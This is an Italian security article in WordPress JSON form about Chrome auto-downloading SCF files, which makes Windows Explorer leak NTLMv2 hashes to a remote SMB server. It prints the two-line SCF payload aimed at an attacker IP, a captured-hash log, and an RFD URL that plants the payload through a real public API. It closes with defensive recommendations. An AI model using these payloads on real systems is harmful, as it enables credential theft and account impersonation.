{"id":49355,"date":"2017-05-17T15:48:14","date_gmt":"2017-05-17T14:48:14","guid":{"rendered":"http:\/\/www.alground.com\/site\/?p=49355"},"modified":"2023-01-09T11:41:23","modified_gmt":"2023-01-09T10:41:23","slug":"vulnerabilita-chrome-possono-rubare-le-password-windows","status":"publish","type":"post","link":"https:\/\/alground.com\/site\/vulnerabilita-chrome-possono-rubare-le-password-windows\/49355\/","title":{"rendered":"Vulnerabilit\u00e0 Chrome, possono rubare le password di Windows"},"content":{"rendered":"

Gli attacchi che rubano le credenziali di autenticazione usando il protocollo di condivisione SMB su Windows sono un problema presente da sempre, di solito limitato alle reti locali.<\/p>\n

Una delle rare ricerche su attacchi Internet \u00e8 stata recentemente presentata da Jonathan Brossard e Hormazd Billimoria alla Black Hat security conference nel 2015 [1]<\/a>\u00a0[2]<\/a>. Tuttavia, non sono stati pubblicati attacchi alle credenziali tramite SMB nell\u2019ultima decade, se non per Internet Explorer ed Edge.<\/p>\n

Questo articolo descrive un attacco che pu\u00f2 portare a furti di credenziali Windows attraverso Google Chrome, incluse tutte le versioni di Windows che lo supportano.<\/p>\n

[miptheme_quote author=”” style=”text-center”]Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop[\/miptheme_quote]<\/p>\n

Il problema<\/strong><\/p>\n

Con la sua configurazione predefinita, Chrome Browser scarica automaticamente i file che ritiene sicuri senza richiedere all’utente un percorso di download, ma utilizzando invece quello predefinito. Da un punto di vista di sicurezza questa funzionalit\u00e0 non \u00e8 un comportamento ideale, in quanto un utente dovrebbe essere consapevole di quello che scarica, scegliendo se procede oppure no. Tuttavia qualsiasi contenuto dannoso, per poter fare danni, necessita che un utente apra ed esegua il file manualmente. Ma cosa succede se il file scaricato non richiedesse interazioni utente per eseguire azioni dannose? Ci sono tipi di file che possono farlo?<\/p>\n

\"\"<\/p>\n

Windows Explorer Shell Command file o SCF (.scf) \u00e8 un tipo di file poco conosciuto che risale a Windows 98. La maggior parte degli utenti di Windows si \u00e8 imbattuta in questo file su Windows 98\/ME\/NT\/2000\/XP dove viene utilizzato, principalmente, come un collegamento-scorciatoia sul desktop. \u00c8 essenzialmente un file di testo con delle sezioni che determinano un comando da eseguire (limitato all’esecuzione di Explorer e al passaggio sul Desktop) e alla posizione di un file di icone. Come esempio, questo potrebbe essere il contenuto file SCF di Show Desktop:<\/p>\n

Come nei file LNK di scorciatoia di Windows, la posizione dell’icona viene risolta automaticamente quando il file viene visualizzato in \u201cEsplora Risorse\u201d. L’impostazione di una posizione dell’icona in un server remoto SMB \u00e8 un vettore di attacco noto che abusa della funzionalit\u00e0 di autenticazione automatica di Windows quando accede a servizi, come le condivisioni di file remoti. Ma qual \u00e8 la differenza tra LNK e SCF dal punto di vista dell’attacco? Chrome permette i file LNK forzando un’estensione .download, ma non fa lo con i file SCF.<\/p>\n

Il file SCF che pu\u00f2 essere utilizzato per ingannare Windows in un tentativo di autenticazione a un server remoto SMB contiene solo due righe, come illustrato nell’esempio seguente:<\/p>\n

[miptheme_quote author=”” style=”text-center”][Shell] IconFile=\\\\170.170.170.170\\icon [\/miptheme_quote]<\/p>\n

Una volta scaricata, la richiesta viene attivata nel momento in cui la cartella di download viene aperta in Windows File Explorer per visualizzare il file, eliminarlo o lavorare con altri file (cosa abbastanza inevitabile). Non \u00e8 necessario fare clic su file o aprirlo, Windows File Explorer prova automaticamente a recupero \u201cl’icona\u201d.<\/p>\n

Il server remoto SMB impostato dall’attaccante \u00e8 pronto a catturare il nome utente della vittima e il NTLMv2 password hash per il cracking online o inviare la connessione a un servizio esterno che accetta lo stesso tipo di autenticazione (ad esempio Microsoft Exchange) per simulare di essere la vittima senza mai conoscerne, in realt\u00e0, la password. Le informazioni acquisite potrebbero apparire come le seguenti:<\/p>\n

[miptheme_quote author=”” style=”text-center”][*] SMB Captured – 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000 00000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201 ccf26d91cd9e326e00000000020000000000000000000000 [\/miptheme_quote]<\/p>\n

L’esempio precedente mostra una divulgazione del username utente, de dominio e de NTLMv2 password hash della vittima.<\/p>\n

Vale la pena ricordare che i file SCF appariranno senza estensione in Windows Explorer, indipendentemente dalle impostazioni di file e cartelle. Di conseguenza, il file chiamato \u201cpicture.jpg.scf\u201d apparir\u00e0 in Esplora risorse come \u201cpicture.jpg\u201d<\/strong>. Ci\u00f2 mostra la natura oscura degli attacchi che utilizzano file SCF.<\/p>\n

Impatto<\/strong><\/p>\n

Dichiarazione di password<\/strong><\/p>\n

Per gli utenti dei domini di Active Directory (corporate, governativi e altre reti), la divulgazione di password pu\u00f2 avere diversi impatti che vanno dalla violazione della rete interna all’accesso a servizi esterni a disposizione di NTLM e alle violazioni in base al riutilizzo della password.<\/p>\n

\"\"<\/p>\n

Per gli utenti Windows 8\/10 che utilizzano un account Microsoft (MSA) anzich\u00e9 un account locale, la divulgazione delle password impatta su tutti i servizi Microsoft integrati con l’SSO di MSA come OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live e altri. Il problema comune della divulgazione delle password pu\u00f2 portare a ulteriori violazioni di account non correlati a MSA, visto il fenomeno comune di utilizzare la stessa password per diversi servizi.<\/p>\n

La fattibilit\u00e0 del cracking delle password \u00e8 stata notevolmente migliorata negli ultimi anni con il cracking basato su GPU. Il benchmark NetNTLMv2 hashcat per una singola scheda Nvidia GTX 1080 \u00e8 di circa 1600 MH\/s, cio\u00e8 1,6 miliardi di hash al secondo. Per una password di 8 caratteri, quattro di queste GPU possono provare tutte le combinazioni di password, contenti caratteri speciali + alfanumerici, in meno di un giorno. Con le centinaia di milioni di password rubate in seguito alle numerose violazioni degli ultimi anni, la creazione di attacchi a dizionario pu\u00f2 produrre risultati sorprendenti contro le password pi\u00f9 complesse.<\/p>\n

La situazione \u00e8 ancora peggiore per i sistemi e le reti Windows XP in cui la compatibilit\u00e0 con NTLMv1 \u00e8 stata abilitata esplicitamente. In questi casi, \u00e8 possibile eseguire un attacco di downgrade che costringa il client ad autenticarsi con un hash\/protocollo pi\u00f9 debole (ad esempio NTLMv1 o addirittura LM) anzich\u00e9 NTLMv2. Ci\u00f2 consente all’aggressore di catturare un hash che pu\u00f2 essere crollato molte volte e pi\u00f9 velocemente di un NTLMv2. Nel caso di LM questo avviene in pochi secondi utilizzando tabelle precompilate per invertire le funzioni di hash crittografiche (“tavole Rainbow”).<\/p>\n

Attacchi SMB Relay<\/strong><\/p>\n

Le organizzazioni che consentono l’accesso remoto ai servizi come Microsoft Exchange (Outlook Anywhere) e consentono l’utilizzo di metodi di autenticazione NTLM possono essere vulnerabili agli attacchi di rete SMB, consentendo all’attaccante di impersonare la vittima, di accedere ai dati e ai sistemi senza dover crackare la password. Questo \u00e8 stato dimostrato con successo da Jonathan Brossard<\/a> alla Black Hat secutiry conference.<\/p>\n

A determinate condizioni (in caso di esposizione esterna) un aggressore pu\u00f2 anche essere in grado di trasmettere le credenziali a un controller di dominio sulla rete della vittima e di ottenere essenzialmente un accesso interno alla rete.<\/p>\n

Gestione antivirus di SCF<\/strong><\/p>\n

Naturalmente, quando un browser non riesce ad avvisare o a ripulire i download da tipi i file potenzialmente pericolosi, si basa su delle soluzioni di sicurezza per farlo funzionare. Abbiamo testato diverse soluzioni antivirus di diversi fornitori per determinare se una soluzione contrassegnerebbe il file scaricato come pericoloso.<\/p>\n

\"\"<\/p>\n

Tutte le soluzioni sperimentate non sono riuscite a contrassegnare i file come sospetti, che speriamo cambieremo presto. L’analisi dei file SCF sarebbe facile da implementare in quanto richiede solo l’ispezione del parametro \u201cIconFile\u201d, considerando che non esistono utilit\u00e0 legittime di SCF con le posizioni di icone remote.<\/p>\n

Introducendo nuovi vettori di attacco<\/strong><\/p>\n

Sebbene l’uso dell’ingegneria sociale per attirare la vittima a visitare il sito web dell’attaccante, nonch\u00e9 la vulnerabilit\u00e0 di reindirizzamento e scripting su siti web attendibili, sono i metodi pi\u00f9 comuni per fornire file dannosi, per questo attacco vorrei aggiungere un problema spesso trascurato e minore.<\/p>\n

Download di file riflesso<\/strong><\/p>\n

Descritta per la prima volta da Oren Hafif, la vulnerabilit\u00e0 del Reflected File Download si verifica quando l\u2019input di un utente specifico viene riflesso nella risposta del sito e scaricato dal browser dell’utente quando le condizioni sono soddisfatte. \u00c8 stato inizialmente utilizzato come vettore di attacco per ingannare l’utente ad eseguire il codice malevolo (di solito da un file batch di Windows), in base alla fiducia dell’utente nel dominio vulnerabile.<\/p>\n

Poich\u00e9 il formato SCF \u00e8 piuttosto semplice e il nostro attacco richiede solo due righe che possono essere precedute e seguite da (quasi) qualsiasi cosa, crea condizioni perfette per essere utilizzate con RFD.<\/p>\n

La RFD \u00e8 di solito rivolta agli endpoint RESTful API in quanto spesso utilizzano URL mapping permissivi, che consentono di impostare l’estensione del file nel percorso URL. Chrome non scarica tutti i tipi di contenuti tipici di risposta API cos\u00ec che questi devono forzati attraverso un attributo di download ( <a href = …. ) \u00a0nei tag di collegamento. Tuttavia, ci sono eccezioni. Chrome utilizza il MIME\/sniffing con il testo\/contenuto e se la risposta contiene un carattere non stampabile verr\u00e0 scaricato direttamente e automaticamente come file, a meno che la direttiva “nosniff” sia impostata.<\/p>\n

Ci\u00f2 pu\u00f2 essere dimostrato sull’API della Banca Mondiale utilizzando il seguente URL:<\/p>\n

http:\/\/api.worldbank.org\/v2\/country\/indicator\/iwantyourhash.scf?prefix=%0A[Shell]%0AIconFile=\\\\170.170.170.170\\test%0Alol=%0B&format=jsonp<\/p>\n

A causa del carattere non stampabile \u201c %0B \u201c Chrome scarica la risposta come file iwantyourhash.scf. Nel momento in cui viene aperta la directory di download che contiene il file, Windows cercher\u00e0 di autenticare il file al server remoto SMB, divulgando gli hash di autenticazione della vittima.\u00a0<\/em><\/p>\n

Raccomandazioni<\/strong><\/p>\n

Per disattivare i download automatici in Google Chrome, dovresti apportare le seguenti modifiche:<\/p>\n

Impostazioni \u00e0 Impostazioni avanzate \u00e0 Controlla la richiesta dove salvare ciascun file prima di scaricare l’opzione.<\/p>\n

L’approvazione manuale di ogni tentativo di download riduce significativamente il rischio di attacchi di furto di credenziali NTLMv2 utilizzando i file SCF.<\/p>\n

Poich\u00e9 i file SCF costituiscono ancora una minaccia, le misure da adottare dipendono dall’ambiente di rete degli utenti interessati e vanno dal semplice rafforzamento del livello dell’host, compresa la configurazione delle regole del firewall, all’applicazione di misure di protezione aggiuntive quali la firma dei pacchetti SMB e la protezione estesa. Con i primi due l’obiettivo \u00e8 quello di impedire al traffico SMB di lasciare l’ambiente aziendale bloccando le porte che possono essere utilizzate per avviare una connessione su Internet con un server SMB potenzialmente dannoso. Quando possibile, il traffico SMB dovrebbe essere sempre limitato a reti private.<\/p>\n

Conclusione<\/strong><\/p>\n

Attualmente, l’attaccante deve solo invogliare la vittima (utilizzando Google Chrome e Windows completamente aggiornati) a visitare il suo sito web per poter procedere e riutilizzare le credenziali di autenticazione della vittima. Anche se la vittima non \u00e8 un utente privilegiato (ad esempio un amministratore), tale vulnerabilit\u00e0 potrebbe rappresentare una minaccia significativa per le grandi organizzazioni in quanto consente all’attaccante di fingersi membri dell’organizzazione, impersonandoli. Tale aggressore potrebbe riutilizzare immediatamente i privilegi acquisiti per accrescere ulteriormente l’accesso ed eseguire attacchi su altri utenti oppure ottenere accesso e controllo delle risorse IT.<\/p>\n

La speranza \u00e8 che Google Chrome venga aggiornato al pi\u00f9 presto per risolvere questo problema<\/p>\n","protected":false},"excerpt":{"rendered":"

Gli attacchi che rubano le credenziali di autenticazione usando il protocollo di condivisione SMB su Windows sono un problema presente da sempre, di solito limitato alle reti locali. Una delle rare ricerche su attacchi Internet \u00e8 stata recentemente presentata da Jonathan Brossard e Hormazd Billimoria alla Black Hat security conference nel 2015 [1]\u00a0[2]. Tuttavia, non […]<\/p>\n","protected":false},"author":3,"featured_media":49364,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pmpro_default_level":"","footnotes":""},"categories":[387,2123,1893],"tags":[],"class_list":{"0":"post-49355","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-guide-sicurezza","8":"category-sistemi","9":"category-cms","10":"pmpro-has-access"},"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/alground.com\/site\/wp-content\/uploads\/2017\/05\/rubare-credenziali-windows-con-google-chrome-evidenza.jpg","wps_subtitle":"Un bug nel noto browser di Google permette di bucare Windows e rapinare le credenziali","_links":{"self":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/posts\/49355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/comments?post=49355"}],"version-history":[{"count":0,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/posts\/49355\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/media\/49364"}],"wp:attachment":[{"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/media?parent=49355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/categories?post=49355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alground.com\/site\/wp-json\/wp\/v2\/tags?post=49355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}